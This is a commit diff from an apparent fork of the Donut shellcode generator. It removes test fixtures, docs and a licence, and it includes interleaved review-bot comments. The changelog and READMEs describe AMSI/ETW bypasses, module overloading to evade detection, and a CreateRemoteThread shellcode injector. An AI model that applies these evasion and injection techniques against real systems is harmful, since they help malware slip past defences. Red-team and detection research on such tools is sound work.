test version

This commit is contained in:
qwqdanchun 2023-04-12 10:39:47 +08:00
parent 61af8ccee3
commit 6f43c3a3c1
69 changed files with 479 additions and 4849 deletions

View File

@ -1,55 +0,0 @@
# Changelog
All notable changes to this project will be documented in this file.
## [v1.0]
### Added
* Added module overloading for native PE payloads. Hides them in MEM_IMAGE memory backed by a decoy file on disk
* If donut is set to mutate native PE headers, then for module overloads it will overwrite the payload's PE headers with those of the decoy file to fool some detections of module overloading
* Added an option to block indefinitely after running the payload
* Added Dockerfile to create a docker image for generating donut shellcode
* Added support for binaries without relocation information or with certain edge cases for relocation information
* Added custom GetProcAddress and LoadLibrary replacement functions that will only call those Win32 API calls as fallbacks
* Better documentation for debugging, designing with, and integrating Donut.
* Added moduler bypass system for ETW
* Added option for preserving or overwriting PE headers of native payloads
* Added an inject_local.exe that runs shellcode in the current process for testing purposes
* C# output generator
* Python output generator
* UUID string output generator
### Changed
* The -y switch now uses the value provided as an offset from the base address of the process's executable module. So, for example, if you have injected donut into an infected, legitimate PE file, then once donut completes it will create a thread at the provided offset of that legitimate PE, allowing it to resume its legitimate execution and do what it was supposed to do in the first place.
* Fixed some issues with the MingW makefile (#96)
* Fixed and improved all makefiles
* Fixed the Python module
## [v0.9.3]
### Added
* The -e switch can be used to disable entropy and/or encryption. Options are: 1=none, 2=generate random names, 3=generate random names + use symmetric encryption.
* The -z switch tells the builder to compress the input file. 1=none, 2=aPLib. On Windows, a further three algorithms are supported, which are 3=LZNT1, 4=Xpress and 5=Xpress Huffman.
* The -f switch specifies the output format for loader. 1=binary, 2=base64, 3=c, 4=ruby, 5=python, 6=powershell, 7=c# and 8=hex. On Windows, Base64 strings are copied to the clipboard.
* The -t switch tells the loader to run unmanaged entrypoint for EXE as a thread. This also attempts to intercept exit-related API in Import Address Table by replacing their pointers with the address of RtlExitUserThread.
* The -n switch can be used to specify name of module for HTTP staging. If entropy is enabled, this is generated randomly.
* The -s switch specifies the HTTP server to download module from.
* The -y switch tells loader to create a new thread for the loader and continues executing at a specific address or Original Entry Point (OEP). The address should be provided as a string in hexadecimal format.
* The -x switch can be used to specify how loader terminates. 1=exit thread, 2=exit process.
* The -p switch is used to specify parameters to .NET method, DLL function or command line for an unmanaged EXE file. Wrap multiple parameters inside quotations.
* The -w switch tells the loader to convert parameters to UNICODE before passing to unmanaged DLL function.
* C# generator by n1xbyte: https://github.com/n1xbyte/donutCS
* Go generator by awgh https://github.com/Binject/go-donut
### Changed
* Command line is no longer parsed using semi-colon or comma as a token. The -p switch now accepts a string with all parameters enclosed in quotation marks. For .NET DLL/EXE, these are separated by the loader using CommandLineToArgvW. For unmanaged DLL, the string is passed to the DLL function without any modification.
* The -u switch to specify URL for HTTP stager is replaced with -s switch to prepare for a DNS stager.
* The -f switch to specify input file is now used to specify output format of loader.
### Removed
* XSL files are no longer supported.
* Code stub for calling DLL function with multiple arguments.
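
Review bot: deleting this file drops the only written record of switch semantics that appear nowhere else in the diff, for example `The -e switch can be used to disable entropy and/or encryption. Options are: 1=none, 2=generate random names, 3=generate random names + use symmetric encryption.` and the v1.0 change that turned `-y` from an absolute address into an offset from the base of the process's executable module. If the fork diverges from upstream, keep the changelog and add a section for the fork's own changes; if it really must go, move at least the v0.9.3 switch table into the README. Should the file be restored, also fix the typo in `Added moduler bypass system for ETW` (modular).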

View File

@ -1,12 +0,0 @@
using System.Diagnostics;
public class TestClass
{
public static void RunProcess(string path, string path2)
{
System.Console.WriteLine("[STDOUT] Running {0} and {1}...", path, path2);
System.Console.Error.WriteLine("[STDERR] Running {0} and {1}...", path, path2);
Process.Start(path);
Process.Start(path2);
}
}
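
Review bot: this removes the only fixture that exercises a .NET DLL whose static method takes two string arguments, i.e. the `-c TestClass -m RunProcess -p "notepad.exe calc.exe"` path that the changelog says the loader splits with CommandLineToArgvW; the Hello World `Main()` kept elsewhere in this diff only covers the EXE entry-point case. If the goal is a leaner repository root, move DemoCreateProcess and DonutTest under a tests/ directory rather than deleting them.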

View File

@ -1,51 +0,0 @@
<Project ToolsVersion="4.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{75C4A31E-6E99-4289-8701-EF0B6CD94435}</ProjectGuid>
<OutputType>Library</OutputType>
<NoStandardLibraries>false</NoStandardLibraries>
<AssemblyName>DemoCreateProcess</AssemblyName>
<TargetFrameworkVersion>v4.0</TargetFrameworkVersion>
<FileAlignment>512</FileAlignment>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup>
<RootNamespace>DemoCreateProcess</RootNamespace>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.CSharp" />
<Reference Include="System" />
<Reference Include="System.Core" />
<Reference Include="System.Data" />
<Reference Include="System.Data.DataSetExtensions" />
<Reference Include="System.Xml" />
<Reference Include="System.Xml.Linq" />
</ItemGroup>
<ItemGroup>
<Compile Include="Class1.cs" />
</ItemGroup>
<ItemGroup>
<None Include="Readme.md" />
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSHARP.Targets" />
<ProjectExtensions>
<VisualStudio AllowExistingFolder="true" />
</ProjectExtensions>
</Project>

View File

@ -1,25 +0,0 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 15
VisualStudioVersion = 15.0.28307.136
MinimumVisualStudioVersion = 10.0.40219.1
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "DemoCreateProcess", "DemoCreateProcess.csproj", "{75C4A31E-6E99-4289-8701-EF0B6CD94435}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{75C4A31E-6E99-4289-8701-EF0B6CD94435}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{75C4A31E-6E99-4289-8701-EF0B6CD94435}.Debug|Any CPU.Build.0 = Debug|Any CPU
{75C4A31E-6E99-4289-8701-EF0B6CD94435}.Release|Any CPU.ActiveCfg = Release|Any CPU
{75C4A31E-6E99-4289-8701-EF0B6CD94435}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {3A24F1AC-B24D-4029-9661-05CA11DAFC82}
EndGlobalSection
EndGlobal

View File

@ -1,36 +0,0 @@
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("DemoCreateProcess")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("DemoCreateProcess")]
[assembly: AssemblyCopyright("Copyright © 2019")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]
// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]
// The following GUID is for the ID of the typelib if this project is exposed to COM
[assembly: Guid("4fcdf3a3-aeef-43ea-9297-0d3bde3bdad2")]
// Version information for an assembly consists of the following four values:
//
// Major Version
// Minor Version
// Build Number
// Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]

View File

@ -1,39 +0,0 @@
# DemoCreateProcess
A simple C# program to use as a demo for testing shellcode. It takes two program names (such as notepad.exe,calc.exe) as parameters. You may generate shellcode for it using donut:
64-bit:
```
.\donut.exe -i .\DemoCreateProcess\bin\Release\DemoCreateProcess.dll -c TestClass -m RunProcess -p "notepad.exe calc.exe"
```
32-bit:
```
.\donut.exe -i -a 1 .\DemoCreateProcess\bin\Release\DemoCreateProcess.dll -c TestClass -m RunProcess -p "notepad.exe calc.exe"
```
# Building on Linux
This project can be built on Linux using Mono and xbuild. First, follow the official [instructions](https://www.mono-project.com/download/stable/#download-lin) for install Mono. Then, install `mono-xbuild`.
To build the project, simply `cd` to its root directory and run:
```
xbuild
```
To build in Release mode, run:
```
xbuild /p:Configuration=Release
```
If receiving errors about missing dependencies, try specifying the targeted .NET version:
```
xbuild /p:TargetFrameworkVersion="v4.5"
```
Once the project has been successfully built, the output DLL may be used as input to the Donut shellcode generator.
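
Review bot: the 32-bit example places `-a 1` between `-i` and its file argument (`.\donut.exe -i -a 1 .\DemoCreateProcess\bin\Release\DemoCreateProcess.dll ...`), so `-a` is read as the input path and the stray `1` falls through to the usage error; the order should be `-a 1 -i .\DemoCreateProcess\bin\Release\DemoCreateProcess.dll`. These two commands are the only documented way to generate the test shellcode, so if the README is restored instead of deleted, fix the ordering at the same time.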

View File

@ -1,16 +0,0 @@
FROM ubuntu:22.04
RUN apt-get update
RUN apt-get install --no-install-recommends --no-install-suggests -y \
mingw-w64 zip build-essential perl python3 xml2 pkg-config automake \
libtool autotools-dev make g++ git ruby wget libssl-dev
WORKDIR /opt
RUN git clone https://github.com/TheWover/donut.git
WORKDIR /opt/donut
RUN make -f Makefile
WORKDIR /workdir
RUN chmod ugo+wrx /workdir
RUN ls /opt/donut
ENTRYPOINT ["/opt/donut/donut"]
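
Review bot: deleting the Dockerfile removes the only reproducible Linux build of the generator. If it is dropped because it builds upstream rather than this fork, the fix is `COPY . /opt/donut` in place of `RUN git clone https://github.com/TheWover/donut.git`, which as written pulls whatever is at upstream HEAD at image-build time and never compiles this fork's loader. While there, `RUN chmod ugo+wrx /workdir` makes the mount point world-writable for no stated reason; a plain `mkdir` plus a `--user` mapping at run time is enough.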

View File

@ -1,6 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<startup>
<supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.7.2"/>
</startup>
</configuration>

View File

@ -1,55 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{3C9A6B88-BED2-4BA8-964C-77EC29BF1846}</ProjectGuid>
<OutputType>Exe</OutputType>
<RootNamespace>DonutTest</RootNamespace>
<AssemblyName>DonutTest</AssemblyName>
<TargetFrameworkVersion>v4.7.2</TargetFrameworkVersion>
<FileAlignment>512</FileAlignment>
<AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>
<Deterministic>true</Deterministic>
<TargetFrameworkProfile />
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
<Prefer32Bit>false</Prefer32Bit>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Core" />
<Reference Include="System.Xml.Linq" />
<Reference Include="System.Data.DataSetExtensions" />
<Reference Include="Microsoft.CSharp" />
<Reference Include="System.Data" />
<Reference Include="System.Net.Http" />
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<Compile Include="Program.cs" />
<Compile Include="Properties\AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<None Include="App.config" />
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
</Project>

View File

@ -1,31 +0,0 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 15
VisualStudioVersion = 15.0.28307.136
MinimumVisualStudioVersion = 10.0.40219.1
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "DonutTest", "DonutTest.csproj", "{3C9A6B88-BED2-4BA8-964C-77EC29BF1846}"
EndProject
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "DemoCreateProcess", "..\DemoCreateProcess\DemoCreateProcess.csproj", "{4FCDF3A3-AEEF-43EA-9297-0D3BDE3BDAD2}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{3C9A6B88-BED2-4BA8-964C-77EC29BF1846}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{3C9A6B88-BED2-4BA8-964C-77EC29BF1846}.Debug|Any CPU.Build.0 = Debug|Any CPU
{3C9A6B88-BED2-4BA8-964C-77EC29BF1846}.Release|Any CPU.ActiveCfg = Release|Any CPU
{3C9A6B88-BED2-4BA8-964C-77EC29BF1846}.Release|Any CPU.Build.0 = Release|Any CPU
{4FCDF3A3-AEEF-43EA-9297-0D3BDE3BDAD2}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{4FCDF3A3-AEEF-43EA-9297-0D3BDE3BDAD2}.Debug|Any CPU.Build.0 = Debug|Any CPU
{4FCDF3A3-AEEF-43EA-9297-0D3BDE3BDAD2}.Release|Any CPU.ActiveCfg = Release|Any CPU
{4FCDF3A3-AEEF-43EA-9297-0D3BDE3BDAD2}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {E91D143E-AB90-41D2-942F-D3F1DC8352F3}
EndGlobalSection
EndGlobal
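
Review bot: the solution references DemoCreateProcess under `{4FCDF3A3-AEEF-43EA-9297-0D3BDE3BDAD2}`, which is the COM typelib `Guid` from that project's AssemblyInfo.cs, not the `{75C4A31E-6E99-4289-8701-EF0B6CD94435}` ProjectGuid declared in DemoCreateProcess.csproj and used by DemoCreateProcess.sln. The two identifiers should agree; moot while the file stays deleted, but align them if it is restored.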

View File

@ -1,12 +0,0 @@
// A Hello World! program in C#.
using System;
namespace HelloWorld
{
class Hello
{
static void Main()
{
Console.WriteLine("Hello World!");
}
}
}

File diff suppressed because one or more lines are too long

View File

@ -1,36 +0,0 @@
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("DonutTest")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("DonutTest")]
[assembly: AssemblyCopyright("Copyright © 2019")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]
// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]
// The following GUID is for the ID of the typelib if this project is exposed to COM
[assembly: Guid("3c9a6b88-bed2-4ba8-964c-77ec29bf1846")]
// Version information for an assembly consists of the following four values:
//
// Major Version
// Minor Version
// Build Number
// Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]

View File

@ -1,42 +0,0 @@
# DonutTest
A simple C# shellcode remote injector to use in testing donut. It contains both x86 and x64 versions of the shellcode, determines the architecture of the target process, and then injects the appropriate version into that process with CreateRemoteThread. The shellcode must be Base64-encoded and dropped into the code as a string. This ensures that it can be run entirely from memory.
You may Base64-encode your shellcode and copy it to your clipboard with the PowerShell below:
```powershell
$filename = "C:\\Test\donut\\loader.bin"
[Convert]::ToBase64String([IO.File]::ReadAllBytes($filename)) | clip
```
```
Usage:
DonutTest.exe [PID]
If no PID is specified, then DonutTest will inject the shellcode into itself.
```
# Building on Linux
This project can be built on Linux using Mono and xbuild. First, follow the official [instructions](https://www.mono-project.com/download/stable/#download-lin) for install Mono. Then, install `mono-xbuild`.
To build the project, simply `cd` to its root directory and run:
```
xbuild
```
To build in Release mode, run:
```
xbuild /p:Configuration=Release
```
If receiving errors about missing dependencies, try specifying the targeted .NET version:
```
xbuild /p:TargetFrameworkVersion="v4.5"
```
Once the project has been successfully built, the output DLL may be used as input to the Donut shellcode generator.
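
Review bot: the closing line `Once the project has been successfully built, the output DLL may be used as input to the Donut shellcode generator.` is copied from the DemoCreateProcess README and is wrong here: DonutTest builds an injector EXE that carries donut's output as a Base64 string, it is not an input to donut. If the README is restored, replace that sentence with a pointer to the usage block above it, and make the PowerShell path consistent (`"C:\\Test\donut\\loader.bin"` mixes single and double backslashes; PowerShell double-quoted strings do not treat backslash as an escape, so `C:\Test\donut\loader.bin` is what is meant).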

View File

@ -1,5 +0,0 @@
var sh
sh = new ActiveXObject("Wscript.Shell")
sh.Run("calc.exe")
WScript.Quit()

View File

@ -1,7 +0,0 @@
Dim sh
Set sh = CreateObject("Wscript.Shell")
Call sh.Run("calc.exe")
Set sh = Nothing
WScript.Quit()

View File

@ -1,36 +0,0 @@
#define WIN32_LEAN_AND_MEAN
#define UNICODE
#include <windows.h>
#include "donut.h"
#pragma comment(lib, "user32.lib")
__declspec(dllexport)
VOID APIENTRY DonutApiVoid(VOID) {
MessageBoxA(NULL, "Hello, World!", "Donut Test for VOID API", MB_OK);
}
__declspec(dllexport)
VOID APIENTRY DonutApiW(PWCHAR argv) {
MessageBoxW(NULL, argv, L"Donut Test for UNICODE strings", MB_OK);
}
__declspec(dllexport)
VOID APIENTRY DonutApiA(PCHAR argv) {
MessageBoxA(NULL, argv, "Donut Test for ANSI strings", MB_OK);
}
__declspec(dllexport)
BOOL APIENTRY DllMain(HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved) {
switch (ul_reason_for_call) {
case DLL_PROCESS_ATTACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
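
Review bot: `#include "donut.h"` is unused in this test DLL (nothing from the generator API is referenced) and ties a payload that should build stand-alone to the generator's header; drop it. `#pragma comment(lib, "user32.lib")` is honoured by MSVC only, so the MinGW build of this file needs `-luser32` on the link line for the MessageBox calls. This DLL is the only fixture for the `-w` (UNICODE parameter) path via `DonutApiW` next to `DonutApiA`, which is a reason to keep it.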

View File

@ -1,146 +0,0 @@
/**
BSD 3-Clause License
Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of the copyright holder nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#include <windows.h>
#include <oleauto.h>
#include <mscoree.h>
#include <comdef.h>
#include <cstdio>
#include <cstdint>
#include <cstring>
#include <cstdlib>
#include <sys/stat.h>
#pragma comment(lib, "mscoree.lib")
#import "mscorlib.tlb" raw_interfaces_only
void rundotnet(void *code, size_t len) {
HRESULT hr;
ICorRuntimeHost *icrh;
IUnknownPtr iu;
mscorlib::_AppDomainPtr ad;
mscorlib::_AssemblyPtr as;
mscorlib::_MethodInfoPtr mi;
VARIANT v1, v2;
SAFEARRAY *sa;
SAFEARRAYBOUND sab;
printf("CorBindToRuntime(ICorRuntimeHost).\n");
hr = CorBindToRuntime(
NULL, // load latest runtime version available
NULL, // load workstation build
CLSID_CorRuntimeHost,
IID_ICorRuntimeHost,
(LPVOID*)&icrh);
if(FAILED(hr)) return;
printf("ICorRuntimeHost::Start()\n");
hr = icrh->Start();
if(SUCCEEDED(hr)) {
printf("ICorRuntimeHost::GetDefaultDomain()\n");
hr = icrh->GetDefaultDomain(&iu);
if(SUCCEEDED(hr)) {
printf("IUnknown::QueryInterface()\n");
hr = iu->QueryInterface(IID_PPV_ARGS(&ad));
if(SUCCEEDED(hr)) {
sab.lLbound = 0;
sab.cElements = len;
printf("SafeArrayCreate()\n");
sa = SafeArrayCreate(VT_UI1, 1, &sab);
if(sa != NULL) {
CopyMemory(sa->pvData, code, len);
printf("AppDomain::Load_3()\n");
hr = ad->Load_3(sa, &as);
if(SUCCEEDED(hr)) {
printf("Assembly::get_EntryPoint()\n");
hr = as->get_EntryPoint(&mi);
if(SUCCEEDED(hr)) {
v1.vt = VT_NULL;
v1.plVal = NULL;
printf("MethodInfo::Invoke_3()\n");
hr = mi->Invoke_3(v1, NULL, &v2);
mi->Release();
}
as->Release();
}
SafeArrayDestroy(sa);
}
ad->Release();
}
iu->Release();
}
icrh->Stop();
}
icrh->Release();
}
int main(int argc, char *argv[])
{
void *mem;
struct stat fs;
FILE *fd;
if(argc != 2) {
printf("usage: rundotnet <.NET assembly>\n");
return 0;
}
// 1. get the size of file
stat(argv[1], &fs);
if(fs.st_size == 0) {
printf("file is empty.\n");
return 0;
}
// 2. try open assembly
fd = fopen(argv[1], "rb");
if(fd == NULL) {
printf("unable to open \"%s\".\n", argv[1]);
return 0;
}
// 3. allocate memory
mem = malloc(fs.st_size);
if(mem != NULL) {
// 4. read file into memory
fread(mem, 1, fs.st_size, fd);
// 5. run the program from memory
rundotnet(mem, fs.st_size);
// 6. free memory
free(mem);
}
// 7. close assembly
fclose(fd);
return 0;
}
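
Review bot: in `main`, the return values of `stat(argv[1], &fs)` and `fread(mem, 1, fs.st_size, fd)` are ignored: with a bad path `fs.st_size` is read uninitialised before `fopen` fails, and a short read hands a partially filled buffer to `rundotnet`. Check both (`if(stat(argv[1], &fs) != 0)` and compare the `fread` result to `fs.st_size`) before calling into the CLR. This harness is also the clearest reference in the tree for the managed loading sequence the loader itself reproduces (`Load_3` on the default AppDomain, `get_EntryPoint`, `Invoke_3`), so fixing it is more useful than deleting it.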

Binary file not shown.

View File

@ -1,6 +1,7 @@
donut: clean
@echo ###### Building exe2h ######
cl /nologo loader\exe2h\exe2h.c loader\exe2h\mmap-windows.c
link -nologo -subsystem:console exe2h.obj mmap-windows.obj
@echo ###### Building loader ######
cl -DBYPASS_AMSI_B -DBYPASS_WLDP_A -DBYPASS_ETW_B -Zp8 -c -nologo -Gy -Os -O1 -GR- -EHa -Oi -GS- -I include loader\loader.c hash.c encrypt.c loader\depack.c loader\clib.c
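
Review bot: the header `@ -1,6 +1,7 @@` says one line was added to this target, but the commit message `test version` does not say which. Since `cl -DBYPASS_AMSI_B -DBYPASS_WLDP_A -DBYPASS_ETW_B ...` is the only place the loader's bypass set is selected, the message (or a comment above the `cl` line) should name the define that changed. `-GS-` on the same line is correct for a position-independent loader (the /GS cookie references the `__security_cookie` global, which a raw code blob cannot resolve) but deserves a comment so nobody later "fixes" it.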

View File

@ -1,6 +1,7 @@
donut: clean
@echo ###### Building exe2h ######
cl /nologo loader\exe2h\exe2h.c loader\exe2h\mmap-windows.c
link -nologo -subsystem:console exe2h.obj mmap-windows.obj
@echo ###### Building loader ######
cl -DBYPASS_AMSI_B -DBYPASS_WLDP_A -DBYPASS_ETW_B -Zp8 -c -nologo -Gy -Os -O1 -GR- -EHa -Oi -GS- -I include loader\loader.c hash.c encrypt.c loader\depack.c loader\clib.c
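
Review bot: this hunk is line-for-line identical to the previous one (the rendering shows no file names). If these are two makefiles rather than a rendering duplicate, put the `BYPASS_*` defines in a single variable both include, so the bypass set cannot drift between the two builds.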

View File

@ -1,29 +0,0 @@
BSD 3-Clause License
Copyright (c) 2019, TheWover
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
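
Review bot: removing LICENSE while the code it covers stays in the tree contradicts the file's own condition 1, `Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.`; a fork that strips the notice is no longer licensed to redistribute. Restore the file, and keep it even if ModuleMonitor is dropped, since the rundotnet.cpp header in this same diff carries the same BSD-3-Clause terms for TheWover and Odzhan.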

View File

@ -1,58 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{361C69F5-7885-4931-949A-B91EEAB170E3}</ProjectGuid>
<OutputType>Exe</OutputType>
<RootNamespace>ModuleMonitor</RootNamespace>
<AssemblyName>ModuleMonitor</AssemblyName>
<TargetFrameworkVersion>v4.7.2</TargetFrameworkVersion>
<FileAlignment>512</FileAlignment>
<Deterministic>true</Deterministic>
<TargetFrameworkProfile />
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
<Prefer32Bit>false</Prefer32Bit>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
